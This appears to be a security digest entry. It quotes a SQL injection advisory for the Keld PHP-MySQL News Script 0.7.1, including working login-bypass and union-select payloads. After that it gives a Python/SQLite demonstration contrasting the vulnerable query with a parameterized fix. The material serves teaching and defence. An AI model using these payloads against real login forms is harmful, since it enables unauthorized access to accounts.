]#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#[
]                                                                                     [
]Name  :  Keld: PHP-MySQL News Script 0.7.1 Remote SQL injection Vulnerability        [
]Author:  suN8Hclf[crimsoN_Loyd9], DaRk-CodeRs Group                                  [
]Source:  http://sourceforge.net/project/showfiles.php?group_id=26365                 [
]Greetz:  c0ndemned, 0in and other DaRk-CodeRs guys, wizZ                             [
]                                                                                     [
]#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#;#;#;#;#;#;#;##;#;#;#;#;#;#;#;#;#[


Conditions: MAGIC_QUOTES=OFF
Vulnerable Code(login.php):

---CODE (login.php)
mysql_select_db($db);
$query = mysql_query("select id,password from users where name = '$username' and password = password('$pass')");
if(mysql_num_rows($query) == 1)
---

Exploit:

All strings should be put into the username box in login.php

[1]. Login bypass

A. admin' OR 1=1/*
   DESC: This will log us into the admin's account
B. fdfds' OR 1=1 limit x/*
   where x - from 0 to... I don't know ;)
   DESC: This will log us into the account of the user who is x-th in the table
 
[2]. Classic Remote SQL Injection

  ' AND 1=2 union select 1,2/*
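The login.php snippet above is the textbook shape of this bug: the username and password are spliced into the SQL text, so once magic_quotes no longer escapes the quote, the rest of the username is parsed as SQL and '/*' comments out the password test. The following is an added example for this digest, not code from the Keld script or its reporter. It mirrors the query in SQLite, with a registered password() function standing in for MySQL's PASSWORD() so the statement keeps the same shape, and contrasts it with the bind-parameter version that fixes it. The two accounts are constructed; the injected username is the one from the post.

```python
import hashlib
import sqlite3


def password(plain: str) -> str:
    """Stand-in for MySQL's PASSWORD(); registered as an SQL function below
    so the queries keep the shape of the one in login.php."""
    return hashlib.sha256(plain.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample database with two accounts (not data from the script)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("password", 1, password)
    conn.execute("create table users (id integer primary key, name text, password text)")
    conn.executemany(
        "insert into users (id, name, password) values (?, ?, password(?))",
        [(1, "admin", "s3cret-admin"), (2, "bob", "bobs-pass")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, pw: str):
    """Mirrors login.php: both values are spliced into the SQL text and the
    caller is logged in when exactly one row comes back (mysql_num_rows == 1).
    A quote in the username ends the literal; what follows is parsed as SQL."""
    sql = (f"select id,password from users where name = '{username}' "
           f"and password = password('{pw}')")
    rows = conn.execute(sql).fetchall()
    return rows[0][0] if len(rows) == 1 else None


def login_parameterized(conn, username: str, pw: str):
    """Fix: bind parameters. The values travel separately from the statement,
    so quotes, comment markers and keywords inside them are only characters."""
    sql = "select id,password from users where name = ? and password = password(?)"
    rows = conn.execute(sql, (username, pw)).fetchall()
    return rows[0][0] if len(rows) == 1 else None
```

Note that the row-count check is not a defence: it happens to reject the first payload when the table holds more than one user, which is exactly why the post's second variant adds 'limit x'. Escaping (what magic_quotes did) only covers quoted string contexts and is the weaker fix; bound parameters remove the parsing problem entirely. The same reasoning applies to the two Team SHATTER PL/SQL advisories in this digest, where dynamic SQL built by concatenation inside a definer-rights package runs with the package owner's privileges, and bind variables or DBMS_ASSERT validation are the corresponding fix.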